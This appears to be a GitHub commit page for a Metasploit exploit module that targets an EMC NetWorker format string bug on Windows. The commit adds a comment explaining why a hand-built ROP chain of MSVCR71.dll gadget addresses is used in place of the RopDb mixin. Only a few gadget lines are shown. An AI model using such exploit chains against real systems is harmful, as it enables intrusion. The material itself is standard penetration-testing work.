Skip to content

Commit 77b1e9e

Browse files
author
jvazquez-r7
committed
added comment about ropdb
1 parent 88c9916 commit 77b1e9e

File tree

1 file changed

+2
-0
lines changed

1 file changed

+2
-0
lines changed

modules/exploits/windows/emc/networker_format_string.rb

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -86,6 +86,8 @@ def exploit
8686
rop_gadgets =
8787
[
8888
# rop chain generated with mona.py
89+
# The RopDb mixin isn't used because there are badchars
90+
# which must be avoided
8991
0x7c354dab, # POP EBP # RETN [MSVCR71.dll]
9092
0x7c354dab, # skip 4 bytes [MSVCR71.dll]
9193
0x7c37678f, # POP EAX # RETN [MSVCR71.dll]

0 commit comments

Comments
 (0)